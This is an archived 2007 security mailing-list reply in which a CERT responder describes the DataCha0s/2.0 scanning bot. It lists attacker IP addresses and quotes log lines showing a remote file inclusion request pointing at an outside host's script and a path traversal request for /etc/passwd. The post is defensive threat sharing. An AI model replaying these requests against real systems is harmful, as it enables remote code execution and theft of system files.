[Dshield] DataCha0s/2.0?

Koen Van Impe koen.vanimpe at belnet.be
Thu Apr 26 11:51:31 GMT 2007


Ryan McConigley wrote:
> Hi, I'm just curious, but has anyone else noticed a sudden rush of
> attempted web exploits from a script/bot that identifies itself as
> DataCha0s/2.0?
> 

Yes.

It looks like a bot that scans for vulnerable Perl AWStats installs
(throw DataCha0s in Google and you'll get a number of interesting hits).

We see similar attempts coming from 133.3.8.135, 217.174.240.113,
72.2.4.176, 203.89.187.231, 217.160.246.125
with requests like this:

[23/Apr/2007:05:26:32 +0200] "GET
/index.php?module=http://www.regimesyndicate.org/powned.txt? HTTP/1.0"
200 2306 "-" "DataCha0s/2.0"
or
[26/Apr/2007:02:58:28 +0200] "GET
/index.php?module=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
HTTP/1.0" 500 534 "-" "DataCha0s/2.0"


-- 
Koen Van Impe - BELNET CERT
koen.vanimpe at belnet.be
PGP Key Id 0xED12AD79
Contact: http://cert.belnet.be/

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 252 bytes
Desc: OpenPGP digital signature
Url : http://lists.sans.org/pipermail/list/attachments/20070426/af0b1ca7/attachment.bin 


More information about the list mailing list